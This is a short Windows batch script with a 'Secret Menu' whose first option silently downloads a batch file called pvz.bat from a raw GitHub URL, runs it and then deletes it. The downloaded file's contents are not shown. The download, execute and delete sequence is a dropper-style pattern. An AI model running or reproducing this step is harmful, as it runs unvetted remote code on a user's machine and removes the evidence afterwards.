@echo off
:secret_menu
cls
echo ================================
echo          Secret Menu
echo ================================
echo 1. Download and Execute pvz.bat
echo 2. Exit to MAIN MENU
echo ================================
set /p choice="Enter your choice (1 or 2): "

if "%choice%"=="1" (
    echo Downloading pvz.bat silently...
    curl -s -o "%userprofile%\pvz.bat" https://raw.githubusercontent.com/JoshBeCute/letssee/refs/heads/main/pvz
    echo Executing pvz.bat...
    call "%userprofile%\pvz.bat"
    echo Deleting pvz.bat...
    del "%userprofile%\pvz.bat"
    goto secret_menu
) else if "%choice%"=="2" (
    echo Exiting to MAIN MENU...
    exit /b
) else (
    goto secret_menu
)
